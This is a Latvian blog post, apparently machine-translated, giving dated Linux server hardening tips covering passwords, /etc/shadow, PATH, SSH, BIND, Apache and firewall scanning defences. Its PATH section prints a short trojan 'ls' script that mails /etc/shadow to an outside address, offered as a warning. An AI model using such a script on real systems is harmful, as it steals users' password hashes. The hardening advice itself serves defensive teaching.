Es ilgu laiku neesmu neko publicējis emuārā, un es vēlētos dalīties ar dažiem padomiem no grāmatas, kas (cita starpā). Es to atradu universitātē, un es tikko lasīju, un, lai arī tas ir godīgi mazliet novecojis un parādītie paņēmieni, visticamāk, nedarbosies, ņemot vērā sistēmas attīstību, tie ir arī interesanti aspekti, kurus var parādīt.
Es vēlos paskaidrot, ka tie ir padomi, kas orientēti uz Linux sistēmu, kas tiek izmantota kā serveris vidējā vai, iespējams, lielā apjomā, jo, lai arī darbvirsmas lietotāju līmenī, tie nebūtu ļoti noderīgi.
Es arī atzīmēju, ka tie ir vienkārši ātrie padomi, un es detalizēti neiedziļināšos, lai gan es plānoju veikt vēl vienu daudz specifiskāku un plašāku ierakstu par konkrētu tēmu. Bet es to redzēšu vēlāk. Sāksim.
Paroļu politika.
Lai gan tas izklausās kā saasinājums, ar labu paroļu politiku ir atšķirība starp neaizsargāto sistēmu vai nē. Tādi uzbrukumi kā "brutāls spēks" izmanto sliktas paroles priekšrocības, lai piekļūtu sistēmai. Visizplatītākie padomi ir:
- Apvienojiet lielos un mazos burtus.
- Izmantojiet īpašās rakstzīmes.
- Skaitļi.
- Vairāk nekā 6 cipari (cerams, ka vairāk nekā 8).
Papildus tam aplūkosim divus būtiskus failus. / etc / passwd un / etc / shadow.
Kaut kas ļoti svarīgs ir tas, ka fails / etc / passwd. Papildus tam, ka mums tiek norādīts lietotāja vārds, viņa lietotāja ID, mapes ceļš, bash .. utt. dažos gadījumos tas parāda arī lietotāja šifrēto atslēgu.
Apskatīsim tā tipisko sastāvu.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
lietotājs: cryptkey: uid: gid: ceļš :: ceļš: bash
Patiesā problēma šeit ir tā, ka šim konkrētajam failam ir atļaujas -rw-r - r– tas nozīmē, ka tai ir lasīšanas atļaujas jebkuram sistēmas lietotājam. un kam ir šifrēta atslēga, nav īsti grūti atšifrēt reālo.
Tāpēc fails pastāv / etc / shadow. Šis ir fails, kurā cita starpā tiek glabātas visas lietotāja atslēgas. Šim failam ir nepieciešamās atļaujas, lai neviens lietotājs to nevarētu izlasīt.
Lai to labotu, mums jādodas uz failu / etc / passwd un nomainiet šifrēto atslēgu uz "x", tas atslēgu saglabās tikai mūsu failā / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problēmas ar PATH un .bashrc un citiem.
Kad lietotājs izpilda komandu savā konsolē, čaula meklē šo komandu direktoriju sarakstā, kas atrodas PATH vides mainīgajā.
Ja konsolē ierakstāt "echo $ PATH", tas izdos kaut ko līdzīgu šim.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
Katrā no šīm mapēm čaula meklēs komandu, kas rakstīta tās izpildei. Viņš "." tas nozīmē, ka pirmā meklējamā mape ir tā pati mape, no kuras tiek izpildīta komanda.
Pieņemsim, ka ir lietotājs "Carlos" un šis lietotājs vēlas "darīt ļaunu". Šis lietotājs savā galvenajā mapē varēja atstāt failu ar nosaukumu "ls" un šajā failā izpildīt komandu, piemēram:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
Un, ja galamērķa saknes lietotājs mēģina uzskaitīt mapes carlos (tā kā tā vispirms meklē komandu tajā pašā mapē, netīšām tas sūtīs failu ar parolēm uz šo e-pastu un pēc tam mapes būtu iekļauts sarakstā, un viņš to uzzinātu tikai ļoti vēlu.
Lai izvairītos no tā, mums ir jānovērš "." mainīgā PATH.
Tādā pašā veidā ir jāpārbauda tādi faili kā /.bashrc, /.bashrc_profile, ./.login un jāpārbauda, vai nav "." mainīgajā PATH un faktiski no šādiem failiem varat mainīt konkrētas komandas galamērķi.
Padomi ar pakalpojumiem:
SHH
- Atspējojiet ssh protokola 1. versiju failā sshd_config.
- Neļaujiet root lietotājam pieteikties, izmantojot ssh.
- Failus un mapes ssh_host_key, ssh_host_dsa_key un ssh_host_rsa_key drīkst lasīt tikai saknes lietotājs.
SAISTĪT
- Mainiet sveiciena ziņojumu nosaukumā.conf failā tā, lai tajā netiktu rādīts versijas numurs
- Ierobežojiet zonu pārsūtīšanu un iespējojiet to tikai komandām, kurām tas nepieciešams.
Apache
- Neļaujiet pakalpojumam parādīt jūsu versiju sveiciena ziņojumā. Rediģējiet failu httpd.conf un pievienojiet vai modificējiet rindas:
ServerSignature Off
ServerTokens Prod
- Atspējot automātisko indeksēšanu
- Konfigurējiet apache, lai tas neapkalpotu tādus sensitīvus failus kā .htacces, * .inc, * .jsp .. utt
- Noņemiet no pakalpojuma rokasgrāmatas vai paraugus
- Palaidiet apache sakņotā vidē
Tīkla drošība.
Ir svarīgi aptvert visus iespējamos ierakstus jūsu sistēmā no ārējā tīkla, šeit ir daži svarīgi padomi, lai neļautu iebrucējiem skenēt un iegūt informāciju no jūsu tīkla.
Bloķēt ICMP trafiku
Ugunsmūris ir jākonfigurē, lai bloķētu visa veida ienākošo un izejošo ICMP trafiku un atbalss atbildes. Izmantojot to, jūs izvairīsities no tā, ka, piemēram, skeneris, kas meklē aktīvu aprīkojumu ip diapazonā, atrod jūs.
Izvairieties no TCP ping skenēšanas.
Viens no sistēmas skenēšanas veidiem ir TCP ping skenēšana. Pieņemsim, ka jūsu serverī 80. portā ir Apache serveris. Iebrucējs varētu nosūtīt ACK pieprasījumu uz šo portu. Tādējādi, ja sistēma reaģēs, dators būs dzīvs un skenēs pārējās ostas.
Lai to izdarītu, jūsu ugunsmūrim vienmēr jābūt opcijai "stāvokļa izpratne" un jāizmet visas ACK paketes, kas neatbilst jau izveidotam TCP savienojumam vai sesijai.
Daži papildu padomi:
- Izmantojiet IDS sistēmas, lai atklātu portu skenēšanu savā tīklā.
- Konfigurējiet ugunsmūri tā, lai tas neuzticētos savienojuma avota porta iestatījumiem.
Tas ir tāpēc, ka daži skenējumi izmanto "viltus" avota portu, piemēram, 20 vai 53, jo daudzas sistēmas uzticas šīm ostām, jo tās ir tipiskas ftp vai DNS.
PIEZĪME: Atcerieties, ka lielākā daļa šajā ziņojumā norādīto problēmu jau ir atrisinātas gandrīz visos pašreizējos izplatījumos. Bet nekad nav sāp, ja jums ir pamatinformācija par šīm problēmām, lai tās nenotiktu ar jums.
PIEZĪME: Vēlāk es redzēšu konkrētu tēmu un izveidošu ierakstu ar daudz detalizētāku un aktuālāku informāciju.
Thaks visiem lasīšanai.
Sveicieni.
Man ļoti patika raksts, un mani interesē tēma, iesaku turpināt augšupielādēt saturu.